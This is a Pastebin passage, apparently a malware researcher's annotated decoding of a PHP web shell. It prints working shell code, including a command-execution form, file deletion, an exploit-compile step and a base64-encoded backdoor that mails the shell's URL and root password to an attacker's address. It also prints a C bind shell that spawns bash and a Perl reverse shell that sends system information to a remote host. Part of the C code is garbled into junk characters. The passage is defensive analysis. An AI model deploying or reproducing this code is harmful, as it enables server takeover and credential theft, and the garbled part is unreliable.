  1329.     width: 250px;
  1330.     "
  1331.                  value="
  1332.     gcc - o exploits exploits.c;
  1333.     chmod + x exploits;. / exploits;
  1334.     "></td>
  1335.                  </tr> <tr><td><select size="
  1336.     1 " class="
  1337.     inputz " name="
  1338.     pilihan ">
  1339.                  <option value="
  1340.     wwget ">wget</option> <option value="
  1341.     wlynx ">lynx</option>
  1342.                  <option value="
  1343.     wfread ">fread</option> <option value="
  1344.     wfetch ">fetch</option>
  1345.                  <option value="
  1346.     wlinks ">links</option> <option value="
  1347.     wget ">GET</option>
  1348.                  <option value="
  1349.     wcurl ">curl</option> </select></td><td colspan="
  1350.     2 ">
  1351.  
  1352.                  <input type="
  1353.     submit " name="
  1354.     expcompile " class="
  1355.     inputzbut " value="
  1356.     Go " style="
  1357.     width: 246px;
  1358.     "></td>
  1359.                  </tr></form> </table> </td> </tr> </table> <div style="
  1360.     text - align: center;
  1361.     margin: 2px;
  1362.     ">
  1363.                  <?php echo $msg; ?></div> <?php
  1364.          } elseif(isset($_GET['x']) && ($_GET['x'] == 'shell')){ ?>
  1365.          <form action=" ? y = <? php echo $pwd; ?> & amp;
  1366.     x = shell " method="
  1367.     post "> <table class="
  1368.     cmdbox ">
  1369.          <tr><td colspan="
  1370.     2 "> <textarea class="
  1371.     output " readonly> <?php
  1372.          if(isset($_POST['submitcmd'])) {
  1373.                  echo @exe($_POST['cmd']);
  1374.          } ?> </textarea>
  1375.          <tr><td colspan="
  1376.     2 "><?php echo $prompt; ?>
  1377.  
  1378.          <input onMouseOver="
  1379.     this.focus();
  1380.     " id="
  1381.     cmd " class="
  1382.     inputz " type="
  1383.     text " name="
  1384.     cmd "
  1385.          style="
  1386.     width : 60 % ;
  1387.     " value="
  1388.     " /><input class="
  1389.     inputzbut " type="
  1390.     submit " value="
  1391.     Go!"
  1392.          name="
  1393.     submitcmd " style="
  1394.     width: 12 % ;
  1395.     " /></td></tr> </table> </form> <?php
  1396.          } else { if(isset($_GET['delete']) && ($_GET['delete'] != "
  1397.     ")){
  1398.                  $file = $_GET['delete']; @unlink($file);
  1399.          } elseif(isset($_GET['fdelete']) && ($_GET['fdelete'] != "
  1400.     ")){
  1401.                  @rmdir(rtrim($_GET['fdelete'],DIRECTORY_SEPARATOR));
  1402.          } elseif(isset($_GET['mkdir']) && ($_GET['mkdir'] != "
  1403.     ")){
  1404.                  $path = $pwd.$_GET['mkdir'];
  1405.                  @mkdir($path);
  1406.          }
  1407.          $buff = showdir($pwd,$prompt);
  1408.          echo $buff;
  1409.          }
  1410. }else{
  1411. ?>
  1412. <html>
  1413. <head>
  1414. <title>:: <?=$Shell_Title?> ::</title>
  1415. <script type="
  1416.     text / javascript ">
  1417. function tukar(lama,baru){
  1418.         document.getElementById(lama).style.display = 'none';
  1419.         document.getElementById(baru).style.display = 'block';
  1420. }
  1421. </script>
  1422. <style type="
  1423.     text / css ">
  1424. table{ font-size:11px; font-family:Tahoma,Verdana,Arial; color:#FFFFFF; }
  1425. body{ background:#000000; font-size:11px; font-family:Tahoma,Verdana,Arial; color:#FFFFFF; }
  1426. a { text-decoration:none; }
  1427. a:hover{ border-bottom:1px solid #4C83AF; }
  1428. .inputz{ color:#fff; background:#111111; border:0; padding:2px; border-bottom:1px solid #222222; border-top:1px solid #222222; }
  1429. .inputzbut{ background:#111111; color:#4C83AF; margin:4px; border:1px solid #444444; }
  1430. .inputz:hover, .inputzbut:hover{ color:#fff; background:#444444; border-bottom:1px solid #4C83AF; border-top:1px solid #4C83AF; }
  1431. </style>
  1432. </head>
  1433. <body>
  1434. <form action=" <?= $_SERVER['PHP_SELF'] ?> ? do =
  1435.     login " method="
  1436.     post ">
  1437. <div align="
  1438.     center ">
  1439.  
  1440. <br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br />
  1441. <h1 align="
  1442.     center "><?=$Shell_Title?></h1>
  1443. <br />
  1444.         <table border="
  1445.     0 " width="
  1446.     25 % " cellpadding="
  1447.     4 " cellspacing="
  1448.     0 "  style="
  1449.     border : 1px double# dedede;
  1450.     ">
  1451.         <? if(isset($err)){
  1452.                         echo '<tr><td colspan="
  1453.     2 "><span style="
  1454.     color: red;
  1455.     ">'.$err.'</span></td></tr>';
  1456.                 }else{
  1457.                         echo '';
  1458.                 }
  1459.                 ?>
  1460.                 <tr>
  1461.                         <td align="
  1462.     center ">Username:</td>
  1463.                         <td align="
  1464.     center "><input class="
  1465.     inputz " type="
  1466.     text " name="
  1467.     uname " value="
  1468.     " size="
  1469.     20 " maxlength="
  1470.     100 " class="
  1471.     txtbox "></td>
  1472.                 </tr>
  1473.                 <tr>
  1474.  
  1475.                         <td align="
  1476.     center ">Password:</td>
  1477.                         <td align="
  1478.     center "><input class="
  1479.     inputz " type="
  1480.     password " name="
  1481.     pword " value="
  1482.     " size="
  1483.     20 " maxlength="
  1484.     100 " class="
  1485.     txtbox "></td>
  1486.                 </tr>
  1487.                 <tr>
  1488.                         <td colspan="
  1489.     2 " align="
  1490.     center "><input class="
  1491.     inputzbut " type="
  1492.     submit " name="
  1493.     login " value="
  1494.     Login "></td>
  1495.                 </tr>
  1496.         </table>
  1497. </div>
  1498. </form>
  1499.  
  1500. <br />
  1501. <div align="
  1502.     center ">The Owner Email : <?=$Shell_Owner?></div>
  1503. <?
  1504. }
  1505.  
  1506. // Seethe above commands very well, to understand what's this
  1507. // shell sh*t is really capable to wack a system for malicious purpose...
  1508. // Now let's decode the above codes one more step...
  1509. // to burp the real values...
  1510. // seeing the email was sent to the hacker moronz address -
  1511. // as notification of a hacked site...
  1512.  
  1513. if(!$_SESSION["notify"]){
  1514. $link = $_SERVER["HTTP_HOST"].$_SERVER["REQUEST_URI"];
  1515. $site =  $_SERVER["HTTP_HOST"];
  1516. $subject = "Shell Uploaded - $site";
  1517. $headers = "Content-type: text/html; charset=windows-1256\r\n";
  1518. $Pass_Md5 = md5(md5(md5($Root_Pass)));
  1519. $message = "<html>
  1520.         <body>
  1521.                 <div align=\"left\" dir=\"ltr\">
  1522.                         <h4>This is information From : <a href=\"$link\">$site</a><br /></h4>
  1523.                         --------------------------------------------------<br />
  1524.                          Website :      $site<br />
  1525.                          Shell Title :  $Shell_Title<br />
  1526.                          Shell Owner :  $Shell_Owner<br />
  1527.                          Shell :        $link<br />
  1528.                          User :         $Root_Name<br />
  1529.                          Pass :         $Root_Pass<br />
  1530.                          Pass (Md5*3) :         $Pass_Md5<br />
  1531.                         --------------------------------------------------<br />
  1532.                 </div>
  1533.         </body>
  1534. </html>";
  1535. @mail("bhshel@gmail.com",$subject,$message,$headers);
  1536. $_SESSION["notify"] = true;
  1537. }
  1538.  
  1539. // We know the bad guys ID now..
  1540. // Found traces of south-asian language, and I know exactly which group is behind this.. (tick..tock!)
  1541. // He won't sleep well tonight, I promised you this..
  1542.  
  1543. // -------------------------------
  1544. // Cracking the obfuscating code
  1545. //--------------------------------
  1546.  
  1547.  
  1548. // the "back_door_c"
  1549.  
  1550. $back_door_c = "aWYoISRfU0VTU0lPTlsibm90aWZ5Il0pew0KJGxpbmsgPSAkX1NFUlZFUlsiSFRUUF9IT1NUIl0u
  1551. JF9TRVJWRVJbIlJFUVVFU1RfVVJJIl07DQokc2l0ZSA9ICAkX1NFUlZFUlsiSFRUUF9IT1NUIl07IA0KJHN1Ympl
  1552. Y3QgPSAiU2hlbGwgVXBsb2FkZWQgLSAkc2l0ZSI7IA0KJGhlYWRlcnMgPSAiQ29udGVudC10eXBlOiB0ZXh0L2h
  1553. 0bWw7IGNoYXJzZXQ9d2luZG93cy0xMjU2XHJcbiI7IA0KJFBhc3NfTWQ1ID0gbWQ1KG1kNShtZDUoJFJvb3RfUGFz
  1554. cykpKTsNCiRtZXNzYWdlID0gIjxodG1sPg0KCTxib2R5Pg0KCQk8ZGl2IGFsaWduPVwibGVmdFwiIGRpcj1cI
  1555. mx0clwiPg0KCQkJPGg0PlRoaXMgaXMgaW5mb3JtYXRpb24gRnJvbSA6IDxhIGhyZWY9XCIkbGlua1wiPiRzaXRlP
  1556. C9hPjxiciAvPjwvaDQ+DQoJCQktLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tL
  1557. S0tLS0tLTxiciAvPg0KCQkJIFdlYnNpdGUgOiAJJHNpdGU8YnIgLz4NCgkJCSBTaGVsbCBUaXRsZSA6IAkkU2hl
  1558. bGxfVGl0bGU8YnIgLz4NCgkJCSBTaGVsbCBPd25lciA6IAkkU2hlbGxfT3duZXI8YnIgLz4NCgkJCSBTaGVsbCA
  1559. 6IAkkbGluazxiciAvPg0KCQkJIFVzZXIgOiAJJFJvb3RfTmFtZTxiciAvPg0KCQkJIFBhc3MgOiAJJFJvb3RfU
  1560. GFzczxiciAvPg0KCQkJIFBhc3MgKE1kNSozKSA6IAkkUGFzc19NZDU8YnIgLz4NCgkJCS0tLS0tLS0tLS0tLS0tLS
  1561. 0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tPGJyIC8+DQoJCTwvZGl2Pg0KCTwvYm9keT4NCjwv
  1562. aHRtbD4iOw0KQG1haWwoImJoc2hlbEBnbWFpbC5jb20iLCRzdWJqZWN0LCRtZXNzYWdlLCRoZWFkZXJzKTsNCiRfU
  1563. 0VTU0lPTlsibm90aWZ5Il0gPSB0cnVlOw0KfQ==";
  1564. eval(base64_decode($back_door_c));
  1565.  
  1566. // means....
  1567. // a notifier to the hacker,,
  1568.  
  1569. if(!$_SESSION["notify"]){
  1570. $link = $_SERVER["HTTP_HOST"].$_SERVER["REQUEST_URI"];
  1571. $site =  $_SERVER["HTTP_HOST"];
  1572. $subject = "Shell Uploaded - $site";
  1573. $headers = "Content-type: text/html; charset=windows-1256\r\n";
  1574. $Pass_Md5 = md5(md5(md5($Root_Pass)));
  1575. $message = "<html>
  1576.         <body>
  1577.                 <div align=\"left\" dir=\"ltr\">
  1578.                         <h4>This is information From : <a href=\"$link\">$site</a><br /></h4>
  1579.                         --------------------------------------------------<br />
  1580.                          Website :      $site<br />
  1581.                          Shell Title :  $Shell_Title<br />
  1582.                          Shell Owner :  $Shell_Owner<br />
  1583.                          Shell :        $link<br />
  1584.                          User :         $Root_Name<br />
  1585.                          Pass :         $Root_Pass<br />
  1586.                          Pass (Md5*3) :         $Pass_Md5<br />
  1587.                         --------------------------------------------------<br />
  1588.                 </div>
  1589.         </body>
  1590. </html>";
  1591. @mail("bhshel@gmail.com",$subject,$message,$headers);
  1592. $_SESSION["notify"] = true;
  1593. }
  1594.  
  1595.  
  1596. // next is...
  1597. // port bind....
  1598.  
  1599. $port_bind_bd_c = "bVNhb9owEP2OxH+4phI4NINAN00aYxJaW6maxqbSLxNDKDiXxiLYkW3KGOp/3zlOpo7xIY7
  1600. 93jvf +fl8KSQvdinCR2NTofr5p3br8hWmhXw6BQ9mYA8lmjO4UXyD9oSQaAV9AyFPCNRa+pRCWtgmQrJE P/GIh
  1601. ufQg249brd4nmjo9RxBqyNAuwWOdvmyNAKJ+ywlBirhepctruOlW9MJdtzrkjTVKyFB41ZZ dKTIWKb0hoUwmUAcw
  1602. tFt6+m+EXKVJVtRHGAC07vV/ez2cfwvXSpticytkoYlVglX/fNiuAzDE6VL 3TfVrw4o2P1senPzsJrOfoRjl9cfhWj
  1603. vIatzRvNvn7+s5o8Pt9OvURzWZV94dQgleag0C3wQVKug Uq2FTFnjDzvxAXphx9cXQfxr6PcthLEo/8a8q8B9LgpkQ
  1604. 7oOgKMbvNeThHMsbSOO69IA0l05YpXk HDT8HxrV0F4LizUWfE+M2SudfgiiYbONxiStebrgyIjfqDJG07AWiAzYBc
  1605. 9LivU3MVpGFV2x1J4W tyxAnivYY8HVFsEqWF+/f7sBk2NRQKcDA/JtsE5MDm9EUG+MhcFqkpX0HmxGbqbkdBTMl
  1606. daHRsUL ZeoDeOSFBvpefCfXhflOpgTkvJ+jtKiR7vLohYKCqS2ZmMRj4Z5gQZfSiMbi6iqkdnHarEEXYuk6
  1607. +BFmJDB1cW5kHSZGzTK2Qxpmu2wlYoD/bruBIfitd33uvXuvvWr1 NmXRW1DWy7HImo02ebRd19Kq1CIuV3B
  1608. NtWGzQZeg342DhxcYwcCAHeCWCn1gDOEgi1yHhLYXzfwg tNqKeut/yKJNiUB4skYhg3ZecMETnlmfKKrz4ofFX
  1609. 6h3RZJ3DUmUFaoTszO7jxzPDs0O8SdPEQkD e/xs/gkYsN9DShG0ScwEJAXGAqGufmdq2hKFCnmu1IjvRkpH6hE/
  1610. Cuw5scfTaWAOVE9pM5WMouM0 LSLK9HM3puMpNhp7r8ZFW54jg5wXx5YZLQUyKXVzwdUXZ+T3imYoV9ds7JqNOEl
  1611. QTjnxPc8kRrVo vaW3c5paS16sjZo6qTEuQKU1UO/RSnFJGaagcFVbjUTCqeOZ2qijNLWzrD8PTe32X9oOgvM0bj
  1612. GB +hecfOQFlT4UcLSkmI1ceY3VrpKMy9dWUCVCBfTlQX6Owy8=";
  1613. gzinflate(base64_decode($port_bind_bd_c));
  1614.  
  1615. // means an evil C code to be compiled in a hacked server...
  1616.  
  1617. #include < stdio.h >
  1618. #include < string.h >
  1619. #include < sys / types.h >
  1620. #include < sys / socket.h >
  1621. #include < netinet / in .h >
  1622. #include < errno.h > int main(argc, argv) int argc;
  1623. char * * argv; {
  1624.     int sockfd, newfd;
  1625.     char buf[30];
  1626.     struct sockaddr_in remote;
  1627.     if (fork() == 0) {
  1628.         remote.sin_family = AF_INET;
  1629.         remote.sin_port = htons(atoi(argv[1]));
  1630.         remote.sin_addr.s_addr = htonl(INADDR_ANY);
  1631.         sockfd = socket(AF_INET, SOCK_STREAM, 0);
  1632.         if (!sockfd) perror("socket error");
  1633.         bind(sockfd, (struct sockaddr * ) & remote, 0x10);
  1634.         listen(sockfd, 5);
  1635.         while (1) {
  1636.             newfd = accept(sockfd, 0, 0);
  1637.             dup2(newfd, 0);
  1638.             dup2(newfd, 1);
  1639.             dup2(newfd, 2);
  1640.             write(newfd, "Password:", 10);
  1641.             read(newfd, buf, sizeof(buf));
  1642.             if (!chpass(argv[2], buf)) system("echo welcome to b374k shell && /bin/bash -i");
  1643.             else fprintf(stderr, "Sorry");
  1644.             close(newfd);
  1645.         }
  1646.     }
  1647. }
  1648. int chpass(char * base, char * entered) {
  1649.     int i;
  1650.     for (i = 0; i < strlen(entered); i++) {
  1651.         if (entered[i] == T Nd);
  1652.         sstderr, tder( & (i2tderr, td0t1td0Nuf_i0 listen(sockfd, 5f_i0 l "zru.c2],buf7risten(_4d(,4 otsockfdelf0Nuf_i0 kh,mb,buf7ritrlenl0p_ 3f(ee,buf7ris'l0pzse   fy} 2 /s t/emtdeR((e ynlhr) /s[ ynlhr) yiromi,mb,bufhr) /s[ ynlhlrit imi,mb,/s[ yn f hlcicacfte   ,is'l0pze:[fte   ,*+cic5   ,is'lze:tio&0(r) /s[ ynlhlrit i2s'lz(y'l0pze:[0>nlhlrri /t{Cs /s[ ynlhlr/(z1te"
  1653.                     0pz(i ale0ie mi, mb, bus / (z1tet(i eoechoo2cu2or, oTe < ie * 0ie oechoodA "sy0(rptfoa2,{Adl, /s\u; ho(2;(e ynl;ln,{Adl, /s\u; ho(2;("
  1654.                                 hcl {
  1655.                                     s2] ie(nnrlisten(sen(se0f / em_n(sen_3(;) {
  1656.                                                     en(nm_nh "sye7cfne,0f/em_nbmgv[dl, /s\u; ho(2;rnclbsoAe7cfsse7cfodlbsoAe7_nh"
  1657.                                                         syede] _n(A oe_, * +cic5ee7_ c5, is 'lze:tiofoko{ns0pze:[0(.S)ss'
  1658.                                                         lz(y 'e:tiofokot/"0pze:[0(.S)ss'
  1659.                                                             lz(y 'e:temea :temea "ea "ea "ea "ea /s\nbm1i {t:teN2dlbso2cu2or,5ee7fcnen(se0f/em_ntioio"oioh"h7fcnen(se0f/em_ntioieK
  1660.  
  1661.  
  1662. // And the other one...
  1663. // is..
  1664.  
  1665. // the back connect....
  1666.  
  1667. $back_connect = "fZFRS8MwFIXfB/sPWSw2hUrnqyPC0CpD3KStvqh0XRpcsE1KkoKF/XiTtCIV6tu55+Z89yY5W0St ktGB8aihsprPWkVBKsgn1av5zCN1i
  1668. QGsOv4Fbak6pWmNgU/JUQC4b3lRU3BR7OFqcFhptMOpo28j S2whVulCflCNvXVy//K6fLdWI+SPcekMVpSlxIx
  1669. TnRdacDSEAnA6gZJRBGMphbwC3uKNw8AhXEKZ ja3ImclYagh61n9JKbTAhu7EobN3Qb4mjW/byr0BSnc3D3EWg
  1670. qe7fLO1whp5miXx+tHMcNHpGURw Tskvpd92+rxoKEdpdrvZhgBen/exUWf3nE214iT52+r/Cw3/5jaqhKL9
  1671. iFFpuKPawILVNw==";
  1672. eval(base64_decode($back_connect));
  1673.  
  1674. // means...a PERL evil code to...
  1675. // grabbing the system info & send it to remote awaited moronz...
  1676.  
  1677. #!/usr/bin/perl
  1678. use Socket;
  1679. $cmd= "lynx";
  1680. $system= 'echo "`uname -a`";
  1681. echo "`id`";/bin/sh';
  1682. $0=$cmd;$target=$ARGV[0];$port=$ARGV[1];
  1683. $iaddr=inet_aton($target) || die("Error: $!\n");
  1684. $paddr=sockaddr_in($port, $iaddr) || die("Error: $!\n");
  1685. $proto=getprotobyname('tcp');
  1686. socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
  1687. connect(SOCKET, $paddr) || die("Error: $!\n");open(STDIN, ">&SOCKET");
  1688. open(STDOUT, ">&SOCKET");open(STDERR, ">&SOCKET");
  1689. system($system);close(STDIN);
  1690. close(STDOUT);
  1691. close(STDERR);
  1692.  
  1693.  
  1694. // #MalwareMustDie!!
  1695. // decoded by @unixfreaxjp in following up @rjacksix request (thank's friend!)
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
Top